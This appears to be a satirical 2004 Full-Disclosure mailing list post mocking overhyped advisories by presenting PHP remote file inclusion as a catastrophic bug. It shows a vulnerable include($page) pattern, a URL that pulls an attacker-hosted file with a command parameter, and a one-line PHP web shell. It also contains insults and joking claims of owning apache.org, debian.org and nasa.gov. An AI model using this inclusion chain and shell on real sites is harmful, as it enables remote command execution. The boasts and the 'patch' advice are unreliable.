[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: "Frog M@n" <frogman@xxxxxxxxxx>
Date: Sat, 3 Jul 2004 06:40:55 +0200

This is IHCTEAM material. We fuck blackhats and we own the planet.
This is a leet advisory, s0 l33t. Just read it and be quiet.

---------------------------

IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr. 
Frog-m@n !!!!

Product: PHP
Version: all
Security level: Very high baby !!!


What's the fuck about:
======================

There is a BIGBUG in all php versions, in the include() function.
If this function is badly used, a roxor hax0r (like us) can compromise
a box remotely. He can execute commands with apache rights. 

Example:

www.fuck-teso.com/index.php?page=whitehats.php

index.php:
...
include($page); // <--- fucking lame
...

So, you don't know, but there is a BIGBUG. You can include a remote page, that 
contains
php code, that will be executed on the fuck-teso server:

www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd=ls%20/tmp

It will give you this result:

suckit.tar.gz do_brk.c adore.tar.gz hello_world.c

So, do you understand what I mean ?
What contains we-own-teso.txt ?
just:
<?
system("$cmd");
?>


Patch:
=====

Don't use the include() function, it is coded by idiots, like THEO@openbsd.
This is so stupid, that we think that this function is maybe a backdoor
from THC.org, the uberh4x0r team very very very leet, that code fucking lame
brute forcers.
Hey guys, you can be hax0red with google, so don't reference your site on 
google.



Fame:
====

We owned everything and everywhere with this exploit:
www.apache.org
www.debian.org
www.nasa.gov

Is was very funny to read .mil files.

ATTENTION !!!

WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH
PLEASE CONTACT US RIGHT NOW :

karl@xxxxxxxxxxx
capashen@xxxxxxxxxxxx
frog-man@xxxxxxxxxxxxx

---------------------------

We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.

$$$ €€€ £££ <--- this is security corps' spirit :)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
  - From: m.esco
- Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
  - From: Duncan Hill
- Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
  - From: nicolas vigier

Prev by Date: [Full-Disclosure] Re: SUSE Security Announcement: kernel (SUSE-SA:2004:020)
Next by Date: Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
Previous by thread: [Full-Disclosure] Re: SUSE Security Announcement: kernel (SUSE-SA:2004:020)
Next by thread: Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
Index(es):
- Date
- Thread